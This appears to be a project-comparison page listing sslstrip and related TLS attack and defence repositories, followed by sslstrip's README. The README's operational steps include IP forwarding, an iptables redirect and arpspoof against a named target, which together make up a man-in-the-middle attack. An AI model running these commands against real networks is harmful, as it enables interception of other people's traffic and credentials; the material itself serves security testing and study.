A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.
Alternatives To Sslstrip
Project NameStarsDownloadsRepos Using ThisPackages Using ThisMost Recent CommitTotal ReleasesLatest ReleaseOpen IssuesLicenseLanguage
5 years ago20gpl-3.0Python
A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.
3 months ago13November 14, 20232apache-2.0Python
D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange. (read-only clone of the original GitLab project)
Sslcertificatechecker Phonegap Plugin147375 years ago4May 22, 201825mitObjective-C
:passport_control: Prevent Man in the Middle attacks with this Cordova plugin
Tls Redirection102
6 years ago
TLS Redirection
8 years ago1gpl-2.0Python
A Proof of Concept for the POODLE vulnerability in SSLv3
3 years ago
This is my personal (big) recopilation about cryptanalysis, crypto tools and challenges
Awesome Tls Hacks42
3 months agocc0-1.0
A collection of SSL/TLS security related resources.
Awesome Tls Security35
a year agoTeX
A collection of (not-so, yet) awesome resources related to TLS, PKI and related stuff
2 years ago3C
Ratched is a transparent Man-in-the-Middle TLS proxy intended for penetration testing
Sidh Writeup26
7 years agoC
Writeup for BKP 2017 challenge "SIDH-RSA-AES128-GCM-SHA256"
Alternatives To Sslstrip
Select To Compare

Alternative Project Comparisons

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing: * Unpack: tar zxvf sslstrip-0.5.tar.gz * Install twisted: sudo apt-get install python-twisted-web * (Optionally) run 'python install' as root to install, or you can just run it out of the directory.

Running: sslstrip can be run from the source base without installation.
Just run 'python -h' as a non-root user to get the command-line options.

The four steps to getting this working (assuming you're running Linux) 

1) Flip your machine into forwarding mode (as root):
   echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info:

Popular Attack Projects
Popular Ssl Projects
Popular Security Categories

Get A Weekly Email With Trending Projects For These Categories
No Spam. Unsubscribe easily at any time.
Man In The Middle